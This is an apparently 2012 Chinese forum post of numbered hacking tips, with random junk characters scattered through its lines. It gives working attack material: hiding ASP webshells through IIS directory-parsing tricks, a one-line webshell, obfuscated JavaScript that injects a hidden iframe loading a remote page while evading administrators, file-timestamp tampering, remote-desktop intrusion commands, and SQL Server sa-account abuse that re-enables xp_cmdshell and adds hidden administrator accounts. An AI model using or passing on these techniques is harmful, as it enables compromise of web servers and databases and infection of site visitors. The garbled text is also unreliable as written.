) a$ l4 k6 Q+ h, q/ L3 h# u1、建立非标准目录:mkdir images..\
" \: r. r/ S; y) E拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp3 X8 z3 e6 A! u; |. U& Y; t
通过web访问ASP木马:http://ip/images../news.asp?action=login! v+ H( w3 B3 i3 j
如何删除非标准目录:rmdir images..\ /s, X8 W! M% G4 c
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
1 A' d, ?$ s Umkdir programme.asp' y0 y h5 r- r2 t, R/ ^6 w; z
新建1.txt文件内容:<!--#include file=”12.jpg”--> n. C/ t% [8 b
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件! a2 f/ M2 O; @: z( w0 I1 c
attrib +H +S programme.asp2 I, c' }$ O' i2 A8 M' [, K
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt7 c* N' O+ h1 E1 ^" i
' O9 v/ Y! j0 O& V* C9 n54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
( Y$ @9 |% Y7 k! i5 a" b e, m5 z# A$ D然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。; t9 A, t( u- _; m0 J. ?
5 [3 g e: ^- y
55、JS隐蔽挂马1 v b/ v2 i7 G/ e
1.: O$ Z$ s) X0 r! y
var tr4c3="<iframe src=ht";
, ^1 O! R' ?# j; |+ Ptr4c3 = tr4c3+"tp:/";* j* G I6 q& N$ K% t+ P4 Y$ L
tr4c3 = tr4c3+"/ww";9 a+ d( Q x0 u/ U2 ]( o
tr4c3 = tr4c3+"w.tr4";
0 W0 J* \' k% K$ y7 Atr4c3 = tr4c3+"c3.com/inc/m";
7 M2 v9 X% T/ l+ ftr4c3 = tr4c3+"m.htm style="display:none"></i";7 ^( M7 B3 _/ g X! q |: C8 `
tr4c3 =tr4c3+"frame>'";/ o0 K3 `7 M& F' y
document.write(tr4c3);6 t$ [9 u( X* g" S( u4 J
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。, P. P( {9 o( L/ v/ F, X5 e: i3 A
+ d% p$ A, Z& v; f1 h2.9 A; |2 T. T# N2 n; N( B
转换进制,然后用EVAL执行。如, k, I( e* g6 p- `2 a
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
% x+ Y, w) n3 y" }0 Z, j1 e( r& X不过这个有点显眼。$ V' v& ^$ y1 E7 r( m" |3 U) j* }
3.% A* E+ @2 c; N! g* m1 f; s
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
8 o; q$ ?: x) }最后一点,别忘了把文件的时间也修改下。# @7 z& A9 e& d3 n8 e$ k4 X& W! S
9 C" ^4 X: Q h5 Y' v; l56.3389终端入侵常用DOS命令
6 ?7 F' k& B4 t9 g( { ataskkill taskkill /PID 1248 /t: l4 B3 l8 h% D: T& `" D/ f; }
c/ k& P3 w2 d$ W7 E* ?# U1 M9 Xtasklist 查进程
: b& ^9 H% V8 ?, w% e% F* J$ C4 t# }/ D
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限1 g2 j' m+ C7 d
iisreset /reboot, ^8 a/ L9 u2 L& Y2 H1 v
tsshutdn /reboot /delay:1 重起服务器# i9 p/ h9 P% J" x. z- x
+ J V/ { V3 q, ]9 u
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
4 A% j. `7 \ \4 F. g1 }# _: D- k0 W. q. u
query user 查看当前终端用户在线情况
: {3 j* O* V, J' p, I/ Q
* U2 R/ L6 E& K: A要显示有关所有会话使用的进程的信息,请键入:query process *# Y$ G1 |- t. y6 {: X/ }
" W# v% h( G7 D# k# U; ^: y5 y7 E
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2& F4 P$ \ t1 @! t9 I, c
6 C6 K; U6 W, H) ~4 N* a
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER27 \% j& o& Z9 `
+ @* O& I9 C- J ~6 i1 ]3 L要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
/ L( v0 u% r/ D# _9 }' i9 M3 i6 g( w6 Z$ x& J! f1 M
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
8 \! |. E& Y2 Z2 Q* n* n$ ~( ?$ p8 U1 Y& k/ N/ G6 \5 f
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
( X' V3 q( `- p& X. o7 P0 w# c, O- p5 B3 C
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
# }* i4 i" P- B: b& s
$ f3 O# L) l" k命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机' F! k. C7 r: Y% ~" k3 {
9 o/ l9 f) u+ R
56、在地址栏或按Ctrl+O,输入:' y7 b1 w; F1 W: g! ]6 C0 R) p1 e; |
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;4 n- a- y) A: H' F
8 }! X: N7 K8 o( V i源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
7 Y, {! I9 q; L# e9 X* ]- K0 @# i( c O: }- F
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
4 K @1 w5 x+ K Z用net localgroup administrators是可以看到管理组下,加了$的用户的。
& C; X. @: @& [
6 l. o: H0 \; N, T& b3 G1 \58、 sa弱口令相关命令
9 R. \' }, o5 V# l& B; W) T v2 d' r% c( v( l0 y
一.更改sa口令方法:+ o- a! T+ K" K8 ?) S# y! R) {6 G% l& o
用sql综合利用工具连接后,执行命令:& s3 m& S. B8 x7 |6 a ~
exec sp_password NULL,'20001001','sa'4 ^2 e6 P) H; g/ c
(提示:慎用!)
, w' K4 b% ~0 }2 ?- o( F5 F3 Y
! D& N2 `% s# D二.简单修补sa弱口令.
, x* w* R# h- o2 ` q$ Q
: _9 U# [0 m$ @$ Q! O) n方法1:查询分离器连接后执行:: H* U' l0 m- u
if exists (select * from4 q8 y& r' a0 |5 ~. C$ W0 D1 D1 W
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and" }4 N5 Z& u6 q8 L* @0 [: l
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
( v! y% W: K0 w6 A% x/ U
) r& k z3 e: Z8 P/ y2 ^7 p3 P, wexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'9 }6 H1 ~! m( e
/ N/ I! O! w- f2 ^0 l! M' Q
GO0 A4 X' N# q [
7 x" u: I; v1 S. u, S
然后按F5键命令执行完毕; u8 H. N0 D- N! ?& M
) f3 C7 {2 Z( c% w方法2:查询分离器连接后0 b& W7 o+ I k; L. R/ n
第一步执行:use master, P6 V+ Z! v, ?% A
第二步执行:sp_dropextendedproc 'xp_cmdshell'9 \" i& C* ^/ ]$ X/ T9 K. _6 p
然后按F5键命令执行完毕
% Y: i7 @- p" I% k$ F- _3 f1 `. o$ I" L* [; t; K
* x2 v) d' i# I; y' |/ k三.常见情况恢复执行xp_cmdshell.
' m( r" h: I% C" r/ M
& e: ^$ p, r( v E3 J
2 G& T& l* d) ~; p, ?1 未能找到存储过程'master..xpcmdshell'.
# K {. z7 l7 J( w( n 恢复方法:查询分离器连接后,
+ l4 x8 G" }/ x第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int5 R( n4 ~1 ~! g' x
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3 d' a5 r( B# m! ?, b然后按F5键命令执行完毕) T; o u2 H6 P, Q; i
5 ~6 q; b, H0 v: P3 d. h2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
: [8 e# i% L5 y G$ O4 l2 o恢复方法:查询分离器连接后,: K1 i; h* E( [+ y
第一步执行:sp_dropextendedproc "xp_cmdshell"
' x3 f4 s* s: P第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' Z$ z/ c' L" f2 o: w1 r
然后按F5键命令执行完毕
( A; ^; W' f7 z; s1 e
7 U, J) A& N- f( q. O% j% q2 I# M8 g+ C3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
( T& w! c& C3 d- Z5 K! c0 t恢复方法:查询分离器连接后,
- k2 n0 y- G/ k# ?第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
6 T ]# r+ Z1 e' M' T; l4 w6 |第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
9 d% |- G& Q6 u* }+ k" A- A! g然后按F5键命令执行完毕
1 D8 o1 A5 j+ U* |# j0 ?
3 e# @5 e1 p4 b四.终极方法.
7 z. g3 R0 Z* r. e. A' z i如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:; [* Y- x* W9 D
查询分离器连接后,# P% \/ \* z6 u% k/ m
2000servser系统:$ m& T) ^/ q) C# t7 N* ]7 [
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
; W. b, Z# A, G+ L
0 M) O6 {, u2 l0 ^0 |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'$ d/ f1 c. S: \. C; \( Y' n2 [
5 C# ?5 m3 w7 x: v0 B, F y7 Hxp或2003server系统:
* K# ?: X2 l& m. o
! G. q2 h4 J. H" e; I* Xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'. S# v) ]4 o0 Y' S7 f) q$ n
( D* G7 ?: K7 D( U+ \# P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
+ |- a) N& c* o$ a |
发表于 2012-9-15 14:13:15
收藏
支持
反对